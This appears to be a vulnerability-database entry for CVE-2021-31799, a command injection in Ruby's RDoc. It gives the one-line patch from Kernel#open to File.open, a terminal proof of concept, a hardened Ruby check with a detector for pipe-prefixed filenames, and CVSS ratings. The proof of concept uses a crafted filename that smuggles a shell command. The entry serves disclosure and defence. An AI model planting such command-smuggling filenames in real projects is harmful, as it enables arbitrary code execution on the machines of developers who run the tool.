Attacker Value: High (1 user assessed)
Exploitability: Moderate (1 user assessed)
User Interaction: None
Privileges Required: Low
Attack Vector: Local

CVE-2021-31799

Disclosure Date: July 30, 2021
MITRE ATT&CK tactics: Initial Access
Validation: Validated

Description

In RDoc 3.11 through 6.x before 6.3.1, as distributed with Ruby through 3.0.1, it is possible to execute arbitrary code via a filename that begins with | (a pipe) and ends in tags.

Ratings: 2
Technical Analysis

CVE-2021-31799

Perlisms strike again in this RDoc command injection. Kernel#open is not safe.

Patch

File is lib/rdoc/rdoc.rb.

   ##
   # Removes file extensions known to be unparseable from +files+ and TAGS
   # files for emacs and vim.

   def remove_unparseable files
     files.reject do |file, *|
       file =~ /\.(?:class|eps|erb|scpt\.txt|svg|ttf|yml)$/i or
         (file =~ /tags$/i and
-         open(file, 'rb') { |io|
+         File.open(file, 'rb') { |io|
            io.read(100) =~ /\A(\f\n[^,]+,\d+$|!_TAG_)/
          })
     end
   end
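Review bot: the one-line swap from `open(file, 'rb')` to `File.open(file, 'rb')` is the entire fix, but nothing in the hunk records why, so a later refactor could quietly reintroduce the bare `open`. Add a comment above the `File.open` call stating that Kernel#open treats a string beginning with `|` as a command to spawn, whereas File.open only ever opens a path, and consider a regression spec that feeds remove_unparseable a filename beginning with `|` and ending in `tags` and asserts that no subprocess is started.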

PoC

wvu@kharak:~/Downloads/poc$ cat vulnerable
cat: vulnerable: No such file or directory
wvu@kharak:~/Downloads/poc$ touch "| echo HACK THE PLANET > vulnerable # tags"
wvu@kharak:~/Downloads/poc$ rdoc
Parsing sources...
100% [ 1/ 1]  | echo HACK THE PLANET > vulnerable # tags

Generating Darkfish format into /Users/wvu/Downloads/poc/doc...

  Files:      1

  Classes:    0 (0 undocumented)
  Modules:    0 (0 undocumented)
  Constants:  0 (0 undocumented)
  Attributes: 0 (0 undocumented)
  Methods:    0 (0 undocumented)

  Total:      0 (0 undocumented)
    0.00% documented

  Elapsed: 0.1s

wvu@kharak:~/Downloads/poc$ cat vulnerable
HACK THE PLANET
wvu@kharak:~/Downloads/poc$
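
To make the fix concrete, here is an added Ruby example (not RDoc's code and not from the assessment above): a hardened version of the tags check built on File.open, alongside a hypothetical filename check a defender could run over a source tree to spot names shaped like the PoC. The helper names, the scratch directory and the files written into it are constructed for this demonstration only.

```ruby
require "tmpdir"

# Regexes copied from RDoc's remove_unparseable: a file counts as an
# emacs/vim TAGS file when its name ends in "tags" and its first bytes
# look like a tags header.
TAGS_NAME  = /tags$/i
TAGS_MAGIC = /\A(\f\n[^,]+,\d+$|!_TAG_)/

# Hardened form of the patched check (hypothetical helper, not RDoc's API).
# File.open always treats its argument as a path; Kernel#open would instead
# spawn a subprocess when the string begins with "|".
def tags_file?(file)
  return false unless file =~ TAGS_NAME
  File.open(file, "rb") { |io| !!(io.read(100) =~ TAGS_MAGIC) }
rescue Errno::ENOENT, Errno::EACCES
  false
end

# Defender-side check: flag names that unpatched RDoc would have handed to
# Kernel#open as a pipe (leading "|" and a name ending in "tags").
def pipe_injection_name?(file)
  File.basename(file).start_with?("|") && !!(file =~ TAGS_NAME)
end

# Runs both checks against constructed files in a throwaway directory.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      # Same shape as the PoC filename; File.binwrite just creates a file
      # with that literal name, nothing in it is executed.
      hostile = "| echo HACK THE PLANET > vulnerable # tags"
      File.binwrite(hostile, "!_TAG_FILE_FORMAT\t2\n")
      File.binwrite("plain_tags", "not a tags header\n")
      {
        hostile_flagged: pipe_injection_name?(hostile),
        hostile_is_tags: tags_file?(hostile),      # read as data, not run
        plain_is_tags:   tags_file?("plain_tags"),
        missing_is_tags: tags_file?("no_such_tags"),
        vulnerable_made: File.exist?("vulnerable"), # false: no shell ran
      }
    end
  end
end
```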

CVSS V3 Severity and Metrics

Base Score: 7.0 High
Impact Score: 5.9
Exploitability Score: 1
Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Local
Attack Complexity (AC): High
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • debian
  • oracle
  • ruby-lang

Products

  • debian linux 10.0
  • debian linux 9.0
  • jd edwards enterpriseone tools
  • rdoc